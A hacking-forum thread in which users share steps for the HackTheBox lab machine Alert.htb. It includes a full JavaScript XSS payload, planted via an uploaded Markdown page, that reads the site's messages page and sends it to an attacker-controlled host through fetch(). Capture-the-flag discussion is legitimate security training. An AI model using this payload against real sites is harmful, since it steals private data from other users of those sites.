Alert.htb
by X_P_L_0_1_D - Saturday November 23, 2024 at 04:50 PM
#31
(Nov 25, 2024, 01:42 AM)grisun0 Wrote: one command to user Tongue



(Nov 24, 2024, 07:25 PM)xxoro Wrote:
(Nov 23, 2024, 09:01 PM)darknesst Wrote: create a md page that reads alert.htb then sends it to your localhost upload it and then click share in the bottom right. then in the contact page send them <img src="shared md page" /> you should get response of the homepage which you can see a messages page and can access that via the same method

<script>
  fetch("http://alert.htb/index.php?page=messages")
    .then(response => response.text()) // Convert the response to text
    .then(data => {     
      fetch("http://<your host>/?data=" + encodeURIComponent(data));
    })
    .catch(error => console.error("Error fetching the messages:", error));
</script>



got a *.txt file, it's empty, i am missing something!!

Hey buddy, after creating your md file and hitting the share button, send a message through contacts by pasting the link to the shared md without the img tag, just the link, and it worked for me!

Thanks for the help, I knew I was missing a step!
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,916 4 hours ago
Last Post: VictorPipeau
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 601 91,514 4 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,790 5 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,604 8 hours ago
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,246 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)